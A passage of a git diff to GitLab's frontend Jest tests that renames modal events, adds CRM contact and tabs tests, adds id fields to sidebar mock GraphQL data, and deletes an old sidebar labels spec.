createFlash from '~/flash'; @@ -12,7 +12,6 @@ jest.mock('~/flash'); describe('SetStatusModalWrapper', () => { let wrapper; - let mockEmoji; const $toast = { show: jest.fn(), }; @@ -63,12 +62,12 @@ describe('SetStatusModalWrapper', () => { afterEach(() => { wrapper.destroy(); - mockEmoji.restore(); + clearEmojiMock(); }); describe('with minimum props', () => { beforeEach(async () => { - mockEmoji = await initEmojiMock(); + await initEmojiMock(); wrapper = createComponent(); return initModal(); }); @@ -112,7 +111,7 @@ describe('SetStatusModalWrapper', () => { describe('improvedEmojiPicker is true', () => { beforeEach(async () => { - mockEmoji = await initEmojiMock(); + await initEmojiMock(); wrapper = createComponent({}, true); return initModal(); }); @@ -126,7 +125,7 @@ describe('SetStatusModalWrapper', () => { describe('with no currentMessage set', () => { beforeEach(async () => { - mockEmoji = await initEmojiMock(); + await initEmojiMock(); wrapper = createComponent({ currentMessage: '' }); return initModal(); }); @@ -146,7 +145,7 @@ describe('SetStatusModalWrapper', () => { describe('with no currentEmoji set', () => { beforeEach(async () => { - mockEmoji = await initEmojiMock(); + await initEmojiMock(); wrapper = createComponent({ currentEmoji: '' }); return initModal(); }); @@ -161,7 +160,7 @@ describe('SetStatusModalWrapper', () => { describe('with no currentMessage set', () => { beforeEach(async () => { - mockEmoji = await initEmojiMock(); + await initEmojiMock(); wrapper = createComponent({ currentEmoji: '', currentMessage: '' }); return initModal(); }); @@ -174,7 +173,7 @@ describe('SetStatusModalWrapper', () => { describe('with currentClearStatusAfter set', () => { beforeEach(async () => { - mockEmoji = await initEmojiMock(); + await initEmojiMock(); wrapper = createComponent({ currentClearStatusAfter: '2021-01-01 00:00:00 UTC' }); return initModal(); }); @@ -190,7 +189,7 @@ describe('SetStatusModalWrapper', () => { describe('update status', () => { describe('succeeds', () => { beforeEach(async () => { - mockEmoji = await initEmojiMock(); + await initEmojiMock(); wrapper = createComponent(); await initModal(); @@ -198,7 +197,7 @@ describe('SetStatusModalWrapper', () => { }); it('clicking "removeStatus" clears the emoji and message fields', async () => { - findModal().vm.$emit('cancel'); + findModal().vm.$emit('secondary'); await wrapper.vm.$nextTick(); expect(findFormField('message').element.value).toBe(''); @@ -206,7 +205,7 @@ describe('SetStatusModalWrapper', () => { }); it('clicking "setStatus" submits the user status', async () => { - findModal().vm.$emit('ok'); + findModal().vm.$emit('primary'); await wrapper.vm.$nextTick(); // set the availability status @@ -215,7 +214,7 @@ describe('SetStatusModalWrapper', () => { // set the currentClearStatusAfter to 30 minutes wrapper.find('[data-testid="thirtyMinutes"]').vm.$emit('click'); - findModal().vm.$emit('ok'); + findModal().vm.$emit('primary'); await wrapper.vm.$nextTick(); const commonParams = { @@ -237,7 +236,7 @@ describe('SetStatusModalWrapper', () => { }); it('calls the "onUpdateSuccess" handler', async () => { - findModal().vm.$emit('ok'); + findModal().vm.$emit('primary'); await wrapper.vm.$nextTick(); expect(wrapper.vm.onUpdateSuccess).toHaveBeenCalled(); @@ -246,14 +245,14 @@ describe('SetStatusModalWrapper', () => { describe('success message', () => { beforeEach(async () => { - mockEmoji = await initEmojiMock(); + await initEmojiMock(); wrapper = createComponent({ currentEmoji: '', currentMessage: '' }); jest.spyOn(UserApi, 'updateUserStatus').mockResolvedValue(); return initModal({ mockOnUpdateSuccess: false }); }); it('displays a toast success message', async () => { - findModal().vm.$emit('ok'); + findModal().vm.$emit('primary'); await wrapper.vm.$nextTick(); expect($toast.show).toHaveBeenCalledWith('Status updated'); @@ -262,7 +261,7 @@ describe('SetStatusModalWrapper', () => { describe('with errors', () => { beforeEach(async () => { - mockEmoji = await initEmojiMock(); + await initEmojiMock(); wrapper = createComponent(); await initModal(); @@ -270,7 +269,7 @@ describe('SetStatusModalWrapper', () => { }); it('calls the "onUpdateFail" handler', async () => { - findModal().vm.$emit('ok'); + findModal().vm.$emit('primary'); await wrapper.vm.$nextTick(); expect(wrapper.vm.onUpdateFail).toHaveBeenCalled(); @@ -279,14 +278,14 @@ describe('SetStatusModalWrapper', () => { describe('error message', () => { beforeEach(async () => { - mockEmoji = await initEmojiMock(); + await initEmojiMock(); wrapper = createComponent({ currentEmoji: '', currentMessage: '' }); jest.spyOn(UserApi, 'updateUserStatus').mockRejectedValue(); return initModal({ mockOnUpdateFailure: false }); }); it('flashes an error message', async () => { - findModal().vm.$emit('ok'); + findModal().vm.$emit('primary'); await wrapper.vm.$nextTick(); expect(createFlash).toHaveBeenCalledWith({ diff --git a/spec/frontend/shortcuts_spec.js b/spec/frontend/shortcuts_spec.js index 455db325066..49148123a1c 100644 --- a/spec/frontend/shortcuts_spec.js +++ b/spec/frontend/shortcuts_spec.js @@ -25,6 +25,7 @@ describe('Shortcuts', () => { jest.spyOn(document.querySelector('.js-new-note-form .js-md-preview-button'), 'focus'); jest.spyOn(document.querySelector('.edit-note .js-md-preview-button'), 'focus'); + jest.spyOn(document.querySelector('#search'), 'focus'); new Shortcuts(); // eslint-disable-line no-new }); @@ -111,4 +112,12 @@ describe('Shortcuts', () => { }); }); }); + + describe('focusSearch', () => { + it('focuses the search bar', () => { + Shortcuts.focusSearch(createEvent('KeyboardEvent')); + + expect(document.querySelector('#search').focus).toHaveBeenCalled(); + }); + }); }); diff --git a/spec/frontend/sidebar/components/assignees/sidebar_assignees_widget_spec.js b/spec/frontend/sidebar/components/assignees/sidebar_assignees_widget_spec.js index 39f63b2a9f4..07da4acef8c 100644 --- a/spec/frontend/sidebar/components/assignees/sidebar_assignees_widget_spec.js +++ b/spec/frontend/sidebar/components/assignees/sidebar_assignees_widget_spec.js @@ -5,7 +5,7 @@ import VueApollo from 'vue-apollo'; import createMockApollo from 'helpers/mock_apollo_helper'; import waitForPromises from 'helpers/wait_for_promises'; import createFlash from '~/flash'; -import { IssuableType } from '~/issue_show/constants'; +import { IssuableType } from '~/issues/constants'; import SidebarAssigneesRealtime from '~/sidebar/components/assignees/assignees_realtime.vue'; import IssuableAssignees from '~/sidebar/components/assignees/issuable_assignees.vue'; import SidebarAssigneesWidget from '~/sidebar/components/assignees/sidebar_assignees_widget.vue'; diff --git a/spec/frontend/sidebar/components/attention_required_toggle_spec.js b/spec/frontend/sidebar/components/attention_requested_toggle_spec.js index 8555068cdd8..0939297a754 100644 --- a/spec/frontend/sidebar/components/attention_required_toggle_spec.js +++ b/spec/frontend/sidebar/components/attention_requested_toggle_spec.js @@ -23,8 +23,8 @@ describe('Attention require toggle', () => { it.each` attentionRequested | icon - ${true} | ${'star'} - ${false} | ${'star-o'} + ${true} | ${'attention-solid'} + ${false} | ${'attention'} `( 'renders $icon icon when attention_requested is $attentionRequested', ({ attentionRequested, icon }) => { diff --git a/spec/frontend/sidebar/components/crm_contacts_spec.js b/spec/frontend/sidebar/components/crm_contacts_spec.js new file mode 100644 index 00000000000..758cff30e2d --- /dev/null +++ b/spec/frontend/sidebar/components/crm_contacts_spec.js @@ -0,0 +1,87 @@ +import Vue from 'vue'; +import VueApollo from 'vue-apollo'; +import { shallowMountExtended } from 'helpers/vue_test_utils_helper'; +import createMockApollo from 'helpers/mock_apollo_helper'; +import waitForPromises from 'helpers/wait_for_promises'; +import createFlash from '~/flash'; +import CrmContacts from '~/sidebar/components/crm_contacts/crm_contacts.vue'; +import getIssueCrmContactsQuery from '~/sidebar/components/crm_contacts/queries/get_issue_crm_contacts.query.graphql'; +import issueCrmContactsSubscription from '~/sidebar/components/crm_contacts/queries/issue_crm_contacts.subscription.graphql'; +import { + getIssueCrmContactsQueryResponse, + issueCrmContactsUpdateResponse, + issueCrmContactsUpdateNullResponse, +} from './mock_data'; + +jest.mock('~/flash'); + +describe('Issue crm contacts component', () => { + Vue.use(VueApollo); + let wrapper; + let fakeApollo; + + const successQueryHandler = jest.fn().mockResolvedValue(getIssueCrmContactsQueryResponse); + const successSubscriptionHandler = jest.fn().mockResolvedValue(issueCrmContactsUpdateResponse); + const nullSubscriptionHandler = jest.fn().mockResolvedValue(issueCrmContactsUpdateNullResponse); + + const mountComponent = ({ + queryHandler = successQueryHandler, + subscriptionHandler = successSubscriptionHandler, + } = {}) => { + fakeApollo = createMockApollo([ + [getIssueCrmContactsQuery, queryHandler], + [issueCrmContactsSubscription, subscriptionHandler], + ]); + wrapper = shallowMountExtended(CrmContacts, { + propsData: { issueId: '123' }, + apolloProvider: fakeApollo, + }); + }; + + afterEach(() => { + wrapper.destroy(); + fakeApollo = null; + }); + + it('should render error message on reject', async () => { + mountComponent({ queryHandler: jest.fn().mockRejectedValue('ERROR') }); + await waitForPromises(); + + expect(createFlash).toHaveBeenCalled(); + }); + + it('calls the query with correct variables', () => { + mountComponent(); + + expect(successQueryHandler).toHaveBeenCalledWith({ + id: 'gid://gitlab/Issue/123', + }); + }); + + it('calls the subscription with correct variable for issue', () => { + mountComponent(); + + expect(successSubscriptionHandler).toHaveBeenCalledWith({ + id: 'gid://gitlab/Issue/123', + }); + }); + + it('renders correct initial results', async () => { + mountComponent({ subscriptionHandler: nullSubscriptionHandler }); + await waitForPromises(); + + expect(wrapper.find('#contact_0').text()).toContain('Someone Important'); + expect(wrapper.find('#contact_container_0').text()).toContain('si@gitlab.com'); + expect(wrapper.find('#contact_1').text()).toContain('Marty McFly'); + }); + + it('renders correct results after subscription update', async () => { + mountComponent(); + await waitForPromises(); + + const contact = ['Dave Davies', 'dd@gitlab.com', '+44 20 1111 2222', 'Vice President']; + contact.forEach((property) => { + expect(wrapper.find('#contact_container_0').text()).toContain(property); + }); + }); +}); diff --git a/spec/frontend/sidebar/components/date/sidebar_date_widget_spec.js b/spec/frontend/sidebar/components/date/sidebar_date_widget_spec.js index 619e89beb23..1e2173e2988 100644 --- a/spec/frontend/sidebar/components/date/sidebar_date_widget_spec.js +++ b/spec/frontend/sidebar/components/date/sidebar_date_widget_spec.js @@ -145,13 +145,20 @@ describe('Sidebar date Widget', () => { ${false} | ${SidebarInheritDate} | ${'SidebarInheritDate'} | ${false} `( 'when canInherit is $canInherit, $componentName display is $expected', - ({ canInherit, component, expected }) => { + async ({ canInherit, component, expected }) => { createComponent({ canInherit }); + await waitForPromises(); expect(wrapper.find(component).exists()).toBe(expected); }, ); + it('does not render SidebarInheritDate when canInherit is true and date is loading', async () => { + createComponent({ canInherit: true }); + + expect(wrapper.find(SidebarInheritDate).exists()).toBe(false); + }); + it('displays a flash message when query is rejected', async () => { createComponent({ dueDateQueryHandler: jest.fn().mockRejectedValue('Houston, we have a problem'), diff --git a/spec/frontend/sidebar/components/date/sidebar_inherit_date_spec.js b/spec/frontend/sidebar/components/date/sidebar_inherit_date_spec.js index 4d38eba8035..fda21e06987 100644 --- a/spec/frontend/sidebar/components/date/sidebar_inherit_date_spec.js +++ b/spec/frontend/sidebar/components/date/sidebar_inherit_date_spec.js @@ -10,7 +10,7 @@ describe('SidebarInheritDate', () => { const findFixedRadio = () => wrapper.findAll(GlFormRadio).at(0); const findInheritRadio = () => wrapper.findAll(GlFormRadio).at(1); - const createComponent = () => { + const createComponent = ({ dueDateIsFixed = false } = {}) => { wrapper = shallowMount(SidebarInheritDate, { provide: { canUpdate: true, @@ -18,11 +18,10 @@ describe('SidebarInheritDate', () => { propsData: { issuable: { dueDate: '2021-04-15', - dueDateIsFixed: true, + dueDateIsFixed, dueDateFixed: '2021-04-15', dueDateFromMilestones: '2021-05-15', }, - isLoading: false, dateType: 'dueDate', }, }); @@ -45,6 +44,13 @@ describe('SidebarInheritDate', () => { expect(findInheritRadio().text()).toBe('Inherited:'); }); + it('does not emit set-date if fixed value does not change', () => { + createComponent({ dueDateIsFixed: true }); + findFixedRadio().vm.$emit('input', true); + + expect(wrapper.emitted('set-date')).toBeUndefined(); + }); + it('emits set-date event on click on radio button', () => { findFixedRadio().vm.$emit('input', true); diff --git a/spec/frontend/sidebar/components/mock_data.js b/spec/frontend/sidebar/components/mock_data.js new file mode 100644 index 00000000000..70c3f8a3012 --- /dev/null +++ b/spec/frontend/sidebar/components/mock_data.js @@ -0,0 +1,56 @@ +export const getIssueCrmContactsQueryResponse = { + data: { + issue: { + id: 'gid://gitlab/Issue/123', + customerRelationsContacts: { + nodes: [ + { + id: 'gid://gitlab/CustomerRelations::Contact/1', + firstName: 'Someone', + lastName: 'Important', + email: 'si@gitlab.com', + phone: null, + description: null, + organization: null, + }, + { + id: 'gid://gitlab/CustomerRelations::Contact/5', + firstName: 'Marty', + lastName: 'McFly', + email: null, + phone: null, + description: null, + organization: null, + }, + ], + }, + }, + }, +}; + +export const issueCrmContactsUpdateNullResponse = { + data: { + issueCrmContactsUpdated: null, + }, +}; + +export const issueCrmContactsUpdateResponse = { + data: { + issueCrmContactsUpdated: { + id: 'gid://gitlab/Issue/123', + customerRelationsContacts: { + nodes: [ + { + id: 'gid://gitlab/CustomerRelations::Contact/13', + firstName: 'Dave', + lastName: 'Davies', + email: 'dd@gitlab.com', + phone: '+44 20 1111 2222', + description: 'Vice President', + organization: null, + }, + ], + }, + }, + }, +}; diff --git a/spec/frontend/sidebar/components/reference/sidebar_reference_widget_spec.js b/spec/frontend/sidebar/components/reference/sidebar_reference_widget_spec.js index cc428693930..69e35cd1d05 100644 --- a/spec/frontend/sidebar/components/reference/sidebar_reference_widget_spec.js +++ b/spec/frontend/sidebar/components/reference/sidebar_reference_widget_spec.js @@ -3,7 +3,7 @@ import Vue from 'vue'; import VueApollo from 'vue-apollo'; import createMockApollo from 'helpers/mock_apollo_helper'; import waitForPromises from 'helpers/wait_for_promises'; -import { IssuableType } from '~/issue_show/constants'; +import { IssuableType } from '~/issues/constants'; import SidebarReferenceWidget from '~/sidebar/components/reference/sidebar_reference_widget.vue'; import issueReferenceQuery from '~/sidebar/queries/issue_reference.query.graphql'; import mergeRequestReferenceQuery from '~/sidebar/queries/merge_request_reference.query.graphql'; diff --git a/spec/frontend/sidebar/components/sidebar_dropdown_widget_spec.js b/spec/frontend/sidebar/components/sidebar_dropdown_widget_spec.js index ca6e5ac5e7f..d7471d99477 100644 --- a/spec/frontend/sidebar/components/sidebar_dropdown_widget_spec.js +++ b/spec/frontend/sidebar/components/sidebar_dropdown_widget_spec.js @@ -17,7 +17,7 @@ import { extendedWrapper } from 'helpers/vue_test_utils_helper'; import waitForPromises from 'helpers/wait_for_promises'; import createFlash from '~/flash'; import { getIdFromGraphQLId } from '~/graphql_shared/utils'; -import { IssuableType } from '~/issue_show/constants'; +import { IssuableType } from '~/issues/constants'; import { timeFor } from '~/lib/utils/datetime_utility'; import SidebarDropdownWidget from '~/sidebar/components/sidebar_dropdown_widget.vue'; import SidebarEditableItem from '~/sidebar/components/sidebar_editable_item.vue'; @@ -369,16 +369,18 @@ describe('SidebarDropdownWidget', () => { describe('when a user is searching', () => { describe('when search result is not found', () => { - it('renders "No milestone found"', async () => { - createComponent(); + describe('when milestone', () => { + it('renders "No milestone found"', async () => { + createComponent(); - await toggleDropdown(); + await toggleDropdown(); - findSearchBox().vm.$emit('input', 'non existing milestones'); + findSearchBox().vm.$emit('input', 'non existing milestones'); - await wrapper.vm.$nextTick(); + await wrapper.vm.$nextTick(); - expect(findDropdownText().text()).toBe('No milestone found'); + expect(findDropdownText().text()).toBe('No milestone found'); + }); }); }); }); diff --git a/spec/frontend/sidebar/components/time_tracking/mock_data.js b/spec/frontend/sidebar/components/time_tracking/mock_data.js index 938750bd58b..3f1b3fa8ec1 100644 --- a/spec/frontend/sidebar/components/time_tracking/mock_data.js +++ b/spec/frontend/sidebar/components/time_tracking/mock_data.js @@ -11,11 +11,13 @@ export const getIssueTimelogsQueryResponse = { __typename: 'Timelog', timeSpent: 14400, user: { + id: 'user-1', name: 'John Doe18', __typename: 'UserCore', }, spentAt: '2020-05-01T00:00:00Z', note: { + id: 'note-1', body: 'A note', __typename: 'Note', }, @@ -25,6 +27,7 @@ export const getIssueTimelogsQueryResponse = { __typename: 'Timelog', timeSpent: 1800, user: { + id: 'user-2', name: 'Administrator', __typename: 'UserCore', }, @@ -36,11 +39,13 @@ export const getIssueTimelogsQueryResponse = { __typename: 'Timelog', timeSpent: 14400, user: { + id: 'user-2', name: 'Administrator', __typename: 'UserCore', }, spentAt: '2021-05-01T00:00:00Z', note: { + id: 'note-2', body: 'A note', __typename: 'Note', }, @@ -65,11 +70,13 @@ export const getMrTimelogsQueryResponse = { __typename: 'Timelog', timeSpent: 1800, user: { + id: 'user-1', name: 'Administrator', __typename: 'UserCore', }, spentAt: '2021-05-07T14:44:55Z', note: { + id: 'note-1', body: 'Thirty minutes!', __typename: 'Note', }, @@ -79,6 +86,7 @@ export const getMrTimelogsQueryResponse = { __typename: 'Timelog', timeSpent: 3600, user: { + id: 'user-1', name: 'Administrator', __typename: 'UserCore', }, @@ -90,11 +98,13 @@ export const getMrTimelogsQueryResponse = { __typename: 'Timelog', timeSpent: 300, user: { + id: 'user-1', name: 'Administrator', __typename: 'UserCore', }, spentAt: '2021-03-10T00:00:00Z', note: { + id: 'note-2', body: 'A note with some time', __typename: 'Note', }, diff --git a/spec/frontend/sidebar/mock_data.js b/spec/frontend/sidebar/mock_data.js index 1ebd3c622ca..42e89a3ba84 100644 --- a/spec/frontend/sidebar/mock_data.js +++ b/spec/frontend/sidebar/mock_data.js @@ -223,6 +223,7 @@ const mockData = { export const issueConfidentialityResponse = (confidential = false) => ({ data: { workspace: { + id: '1', __typename: 'Project', issuable: { __typename: 'Issue', @@ -236,6 +237,7 @@ export const issueConfidentialityResponse = (confidential = false) => ({ export const issuableDueDateResponse = (dueDate = null) => ({ data: { workspace: { + id: '1', __typename: 'Project', issuable: { __typename: 'Issue', @@ -249,6 +251,7 @@ export const issuableDueDateResponse = (dueDate = null) => ({ export const issuableStartDateResponse = (startDate = null) => ({ data: { workspace: { + id: '1', __typename: 'Group', issuable: { __typename: 'Epic', @@ -265,6 +268,7 @@ export const issuableStartDateResponse = (startDate = null) => ({ export const epicParticipantsResponse = () => ({ data: { workspace: { + id: '1', __typename: 'Group', issuable: { __typename: 'Epic', @@ -290,6 +294,7 @@ export const epicParticipantsResponse = () => ({ export const issueReferenceResponse = (reference) => ({ data: { workspace: { + id: '1', __typename: 'Project', issuable: { __typename: 'Issue', @@ -303,6 +308,7 @@ export const issueReferenceResponse = (reference) => ({ export const issueSubscriptionsResponse = (subscribed = false, emailsDisabled = false) => ({ data: { workspace: { + id: '1', __typename: 'Project', issuable: { __typename: 'Issue', @@ -318,6 +324,7 @@ export const issuableQueryResponse = { data: { workspace: { __typename: 'Project', + id: '1', issuable: { __typename: 'Issue', id: 'gid://gitlab/Issue/1', @@ -344,6 +351,7 @@ export const searchQueryResponse = { data: { workspace: { __typename: 'Project', + id: '1', users: { nodes: [ { @@ -428,12 +436,15 @@ export const searchResponse = { data: { workspace: { __typename: 'Project', + id: '1', users: { nodes: [ { + id: 'gid://gitlab/User/1', user: mockUser1, }, { + id: 'gid://gitlab/User/4', user: mockUser2, }, ], @@ -445,6 +456,7 @@ export const searchResponse = { export const projectMembersResponse = { data: { workspace: { + id: '1', __typename: 'Project', users: { nodes: [ @@ -452,10 +464,11 @@ export const projectMembersResponse = { null, null, // Remove duplicated entry https://gitlab.com/gitlab-org/gitlab/-/issues/327822 - { user: mockUser1 }, - { user: mockUser1 }, - { user: mockUser2 }, + { id: 'user-1', user: mockUser1 }, + { id: 'user-2', user: mockUser1 }, + { id: 'user-3', user: mockUser2 }, { + id: 'user-4', user: { id: 'gid://gitlab/User/2', avatarUrl: @@ -477,16 +490,18 @@ export const projectMembersResponse = { export const groupMembersResponse = { data: { workspace: { - __typename: 'roup', + id: '1', + __typename: 'Group', users: { nodes: [ // Remove nulls https://gitlab.com/gitlab-org/gitlab/-/issues/329750 null, null, // Remove duplicated entry https://gitlab.com/gitlab-org/gitlab/-/issues/327822 - { user: mockUser1 }, - { user: mockUser1 }, + { id: 'user-1', user: mockUser1 }, + { id: 'user-2', user: mockUser1 }, { + id: 'user-3', user: { id: 'gid://gitlab/User/2', avatarUrl: @@ -509,6 +524,7 @@ export const participantsQueryResponse = { data: { workspace: { __typename: 'Project', + id: '1', issuable: { __typename: 'Issue', id: 'gid://gitlab/Issue/1', @@ -578,6 +594,7 @@ export const mockMilestone2 = { export const mockProjectMilestonesResponse = { data: { workspace: { + id: 'gid://gitlab/Project/1', attributes: { nodes: [mockMilestone1, mockMilestone2], }, @@ -663,6 +680,7 @@ export const todosResponse = { data: { workspace: { __typename: 'Group', + id: '1', issuable: { __typename: 'Epic', id: 'gid://gitlab/Epic/4', @@ -681,6 +699,7 @@ export const todosResponse = { export const noTodosResponse = { data: { workspace: { + id: '1', __typename: 'Group', issuable: { __typename: 'Epic', diff --git a/spec/frontend/sidebar/sidebar_labels_spec.js b/spec/frontend/sidebar/sidebar_labels_spec.js deleted file mode 100644 index 8437ee1b723..00000000000 --- a/spec/frontend/sidebar/sidebar_labels_spec.js +++ /dev/null @@ -1,190 +0,0 @@ -import { shallowMount } from '@vue/test-utils'; -import { - mockLabels, - mockRegularLabel, -} from 'jest/vue_shared/components/sidebar/labels_select_vue/mock_data'; -import updateIssueLabelsMutation from '~/boards/graphql/issue_set_labels.mutation.graphql'; -import { MutationOperationMode } from '~/graphql_shared/utils'; -import { IssuableType } from '~/issue_show/constants'; -import SidebarLabels from '~/sidebar/components/labels/sidebar_labels.vue'; -import updateMergeRequestLabelsMutation from '~/sidebar/queries/update_merge_request_labels.mutation.graphql'; -import { toLabelGid } from '~/sidebar/utils'; -import { DropdownVariant } from '~/vue_shared/components/sidebar/labels_select_vue/constants'; -import LabelsSelect from '~/vue_shared/components/sidebar/labels_select_vue/labels_select_root.vue'; - -describe('sidebar labels', () => { - let wrapper; - - const defaultProps = { - allowLabelCreate: true, - allowLabelEdit: true, - allowScopedLabels: true, - canEdit: true, - iid: '1', - initiallySelectedLabels: mockLabels, - issuableType: 'issue', - labelsFetchPath: '/gitlab-org/gitlab-test/-/labels.json?include_ancestor_groups=true', - labelsManagePath: '/gitlab-org/gitlab-test/-/labels', - projectIssuesPath: '/gitlab-org/gitlab-test/-/issues', - projectPath: 'gitlab-org/gitlab-test', - fullPath: 'gitlab-org/gitlab-test', - }; - - const $apollo = { - mutate: jest.fn().mockResolvedValue(), - }; - - const userUpdatedLabels = [ - { - ...mockRegularLabel, - set: false, - }, - { - id: 40, - title: 'Security', - color: '#ddd', - text_color: '#fff', - set: true, - }, - { - id: 55, - title: 'Tooling', - color: '#ddd', - text_color: '#fff', - set: false, - }, - ]; - - const findLabelsSelect = () => wrapper.find(LabelsSelect); - - const mountComponent = (props = {}) => { - wrapper = shallowMount(SidebarLabels, { - provide: { - ...defaultProps, - ...props, - }, - mocks: { - $apollo, - }, - }); - }; - - afterEach(() => { - wrapper.destroy(); - wrapper = null; - }); - - describe('LabelsSelect props', () => { - beforeEach(() => { - mountComponent(); - }); - - it('are as expected', () => { - expect(findLabelsSelect().props()).toMatchObject({ - allowLabelCreate: defaultProps.allowLabelCreate, - allowLabelEdit: defaultProps.allowLabelEdit, - allowMultiselect: true, - allowScopedLabels: defaultProps.allowScopedLabels, - footerCreateLabelTitle: 'Create project label', - footerManageLabelTitle: 'Manage project labels', - labelsCreateTitle: 'Create project label', - labelsFetchPath: defaultProps.labelsFetchPath, - labelsFilterBasePath: defaultProps.projectIssuesPath, - labelsManagePath: defaultProps.labelsManagePath, - labelsSelectInProgress: false, - selectedLabels: defaultProps.initiallySelectedLabels, - variant: DropdownVariant.Sidebar, - }); - }); - }); - - describe('when type is issue', () => { - beforeEach(() => { - mountComponent({ issuableType: IssuableType.Issue }); - }); - - describe('when labels are updated', () => { - it('invokes a mutation', () => { - findLabelsSelect().vm.$emit('updateSelectedLabels', userUpdatedLabels); - - const expected = { - mutation: updateIssueLabelsMutation, - variables: { - input: { - iid: defaultProps.iid, - projectPath: defaultProps.projectPath, - labelIds: [toLabelGid(29), toLabelGid(28), toLabelGid(27), toLabelGid(40)], - }, - }, - }; - - expect($apollo.mutate).toHaveBeenCalledWith(expected); - }); - }); - - describe('when label `x` is clicked', () => { - it('invokes a mutation', () => { - findLabelsSelect().vm.$emit('onLabelRemove', 27); - - const expected = { - mutation: updateIssueLabelsMutation, - variables: { - input: { - iid: defaultProps.iid, - projectPath: defaultProps.projectPath, - removeLabelIds: [27], - }, - }, - }; - - expect($apollo.mutate).toHaveBeenCalledWith(expected); - }); - }); - }); - - describe('when type is merge_request', () => { - beforeEach(() => { - mountComponent({ issuableType: IssuableType.MergeRequest }); - }); - - describe('when labels are updated', () => { - it('invokes a mutation', () => { - findLabelsSelect().vm.$emit('updateSelectedLabels', userUpdatedLabels); - - const expected = { - mutation: updateMergeRequestLabelsMutation, - variables: { - input: { - iid: defaultProps.iid, - labelIds: [toLabelGid(29), toLabelGid(28), toLabelGid(27), toLabelGid(40)], - operationMode: MutationOperationMode.Replace, - projectPath: defaultProps.projectPath, - }, - }, - }; - - expect($apollo.mutate).toHaveBeenCalledWith(expected); - }); - }); - - describe('when label `x` is clicked', () => { - it('invokes a mutation', () => { - findLabelsSelect().vm.$emit('onLabelRemove', 27); - - const expected = { - mutation: updateMergeRequestLabelsMutation, - variables: { - input: { - iid: defaultProps.iid, - labelIds: [toLabelGid(27)], - operationMode: MutationOperationMode.Remove, - projectPath: defaultProps.projectPath, - }, - }, - }; - - expect($apollo.mutate).toHaveBeenCalledWith(expected); - }); - }); - }); -}); diff --git a/spec/frontend/snippets/components/__snapshots__/snippet_visibility_edit_spec.js.snap b/spec/frontend/snippets/components/__snapshots__/snippet_visibility_edit_spec.js.snap index 5df69ffb5f8..f4ebc5c3e3f 100644 --- a/spec/frontend/snippets/components/__snapshots__/snippet_visibility_edit_spec.js.snap +++ b/spec/frontend/snippets/components/__snapshots__/snippet_visibility_edit_spec.js.snap @@ -23,6 +23,7 @@ exports[`Snippet Visibility Edit component rendering matches the snapshot 1`] = class="gl-mb-0" id="visibility-level-setting" labeldescription="" + optionaltext="(optional)" > <gl-form-radio-group-stub checked="private" diff --git a/spec/frontend/snippets/components/edit_spec.js b/spec/frontend/snippets/components/edit_spec.js index 4e88ab9504e..80a8b8ec489 100644 --- a/spec/frontend/snippets/components/edit_spec.js +++ b/spec/frontend/snippets/components/edit_spec.js @@ -53,6 +53,7 @@ const createMutationResponse = (key, obj = {}) => ({ errors: [], snippet: { __typename: 'Snippet', + id: 1, webUrl: TEST_WEB_URL, }, }, diff --git a/spec/frontend/snippets/components/snippet_header_spec.js b/spec/frontend/snippets/components/snippet_header_spec.js index 552a1c6fcde..2d5e0cfd615 100644 --- a/spec/frontend/snippets/components/snippet_header_spec.js +++ b/spec/frontend/snippets/components/snippet_header_spec.js @@ -252,7 +252,7 @@ describe('Snippet header component', () => { disabled: false, href: `/foo/-/snippets/new`, text: 'New snippet', - variant: 'success', + variant: 'confirm', }, ]), ); diff --git a/spec/frontend/snippets/test_utils.js b/spec/frontend/snippets/test_utils.js index 8ba5a2fe5dc..dcef8fc9a8b 100644 --- a/spec/frontend/snippets/test_utils.js +++ b/spec/frontend/snippets/test_utils.js @@ -27,6 +27,7 @@ export const createGQLSnippet = () => ({ }, project: { __typename: 'Project', + id: 'project-1', fullPath: 'group/project', webUrl: `${TEST_HOST}/group/project`, }, diff --git a/spec/frontend/tabs/index_spec.js b/spec/frontend/tabs/index_spec.js new file mode 100644 index 00000000000..98617b404ff --- /dev/null +++ b/spec/frontend/tabs/index_spec.js @@ -0,0 +1,260 @@ +import { GlTabsBehavior, TAB_SHOWN_EVENT } from '~/tabs'; +import { ACTIVE_PANEL_CLASS, ACTIVE_TAB_CLASSES } from '~/tabs/constants'; +import { getFixture, setHTMLFixture } from 'helpers/fixtures'; + +const tabsFixture = getFixture('tabs/tabs.html'); + +describe('GlTabsBehavior', () => { + let glTabs; + let tabShownEventSpy; + + const findByTestId = (testId) => document.querySelector(`[data-testid="${testId}"]`); + const findTab = (name) => findByTestId(`${name}-tab`); + const findPanel = (name) => findByTestId(`${name}-panel`); + + const getAttributes = (element) => + Array.from(element.attributes).reduce((acc, attr) => { + acc[attr.name] = attr.value; + return acc; + }, {}); + + const expectActiveTabAndPanel = (name) => { + const tab = findTab(name); + const panel = findPanel(name); + + expect(glTabs.activeTab).toBe(tab); + + expect(getAttributes(tab)).toMatchObject({ + 'aria-controls': panel.id, + 'aria-selected': 'true', + role: 'tab', + id: expect.any(String), + }); + + ACTIVE_TAB_CLASSES.forEach((klass) => { + expect(tab.classList.contains(klass)).toBe(true); + }); + + expect(getAttributes(panel)).toMatchObject({ + 'aria-labelledby': tab.id, + role: 'tabpanel', + }); + + expect(panel.classList.contains(ACTIVE_PANEL_CLASS)).toBe(true); + }; + + const expectInactiveTabAndPanel = (name) => { + const tab = findTab(name); + const panel = findPanel(name); + + expect(glTabs.activeTab).not.toBe(tab); + + expect(getAttributes(tab)).toMatchObject({ + 'aria-controls': panel.id, + 'aria-selected': 'false', + role: 'tab', + tabindex: '-1', + id: expect.any(String), + }); + + ACTIVE_TAB_CLASSES.forEach((klass) => { + expect(tab.classList.contains(klass)).toBe(false); + }); + + expect(getAttributes(panel)).toMatchObject({ + 'aria-labelledby': tab.id, + role: 'tabpanel', + }); + + expect(panel.classList.contains(ACTIVE_PANEL_CLASS)).toBe(false); + }; + + const expectGlTabShownEvent = (name) => { + expect(tabShownEventSpy).toHaveBeenCalledTimes(1); + + const [event] = tabShownEventSpy.mock.calls[0]; + expect(event.target).toBe(findTab(name)); + + expect(event.detail).toEqual({ + activeTabPanel: findPanel(name), + }); + }; + + const triggerKeyDown = (code, element) => { + const event = new KeyboardEvent('keydown', { code }); + + element.dispatchEvent(event); + }; + + it('throws when instantiated without an element', () => { + expect(() => new GlTabsBehavior()).toThrow('Cannot instantiate'); + }); + + describe('when given an element', () => { + afterEach(() => { + glTabs.destroy(); + }); + + beforeEach(() => { + 